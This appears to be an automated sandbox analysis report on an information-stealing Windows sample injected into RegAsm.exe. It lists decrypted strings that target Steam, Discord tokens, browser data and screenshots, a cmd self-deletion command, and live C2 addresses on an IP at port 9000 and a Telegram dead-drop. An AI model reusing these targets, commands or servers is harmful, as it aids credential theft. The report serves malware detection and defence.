                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DialogConfig.vdf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: libraryfolders.vdf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: loginusers.vdf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Steam\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: browsers
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: done
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Soft
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: https
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: POST
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HTTP/1.1
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: hwid
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: build
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: token
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: file_name
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: file
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: message
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407E41 CryptUnprotectData,LocalAlloc,LocalFree,2_2_00407E41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041302D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_0041302D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407DC2 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00407DC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040AB80 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,2_2_0040AB80
                Source: 56bDgH9sMQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: 56bDgH9sMQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.dr
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C7D43A FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00C7D43A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409FC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C039 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040C039
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004164C7 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004164C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BC98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416D7D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00416D7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040D690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040C6B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004177D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_004177D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041738D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_0041738D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004169EC GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,2_2_004169EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199707802586
                Source: Malware configuration extractorURLs: https://t.me/g067n
                Source: global trafficTCP traffic: 192.168.2.4:49732 -> 195.201.251.214:9000
                Source: global trafficHTTP traffic detected: GET /g067n HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 195.201.251.214 195.201.251.214
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004058C4 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_004058C4
                Source: global trafficHTTP traffic detected: GET /g067n HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabU
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: RegAsm.exe, 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214/
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/0cosoft
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/9zn
                Source: RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/:9000
                Source: RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/Mac
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/O
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dll
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllatch
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllffsets
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllge
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllm
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllu
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/icrosoft
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/l
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/mozglue.dll
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/mozglue.dlla
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/mozglue.dllge
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/mozglue.dllo
                Source: RegAsm.exe, 00000002.00000002.3052745059.0000000001135000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/msvcp140.dll
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/msvcp140.dlle
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/msvcp140.dllet
                Source: RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nes
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nss3.dll
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nss3.dllA
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nss3.dllU
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nss3.dllo
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nzC
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/softokn3.dll
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/softokn3.dllV
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/softokn3.dlle
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/softokn3.dllll
                Source: RegAsm.exe, 00000002.00000002.3052745059.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/sqlt.dll
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dll
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dllD
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dller
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dlls
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dllt
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/y
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:900030cle
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000Google
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000Microsoft
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000g
                Source: BGDAAK.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: BGDAAK.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: BGDAAK.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: BGDAAK.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: BGDAAK.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: BGDAAK.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: BGDAAK.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 56bDgH9sMQ.exe, 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199707802586
                Source: 56bDgH9sMQ.exe, 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3055858373.00000000196AC000.00000004.00000020.00020000.00000000.sdmp, BAKFCB.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: BAKFCB.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3055858373.00000000196AC000.00000004.00000020.00020000.00000000.sdmp, BAKFCB.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: BAKFCB.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/g067n
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/g067nJt
                Source: 56bDgH9sMQ.exe, 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/g067nry1neMozilla/5.0
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/pjm
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: BGDAAK.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: BGDAAK.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00413160 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_00413160

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 2.2.RegAsm.exe.42e038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                Source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTRMatched rule: Detects Molerats sample - July 2017 Author: Florian Roth
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C879300_2_00C87930
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C730500_2_00C73050
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C6F9340_2_00C6F934
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C8123B0_2_00C8123B
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C644300_2_00C64430
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C76DB90_2_00C76DB9
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C777D90_2_00C777D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041ECEC2_2_0041ECEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E9192_2_0041E919
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041EEC12_2_0041EEC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041F6CF2_2_0041F6CF
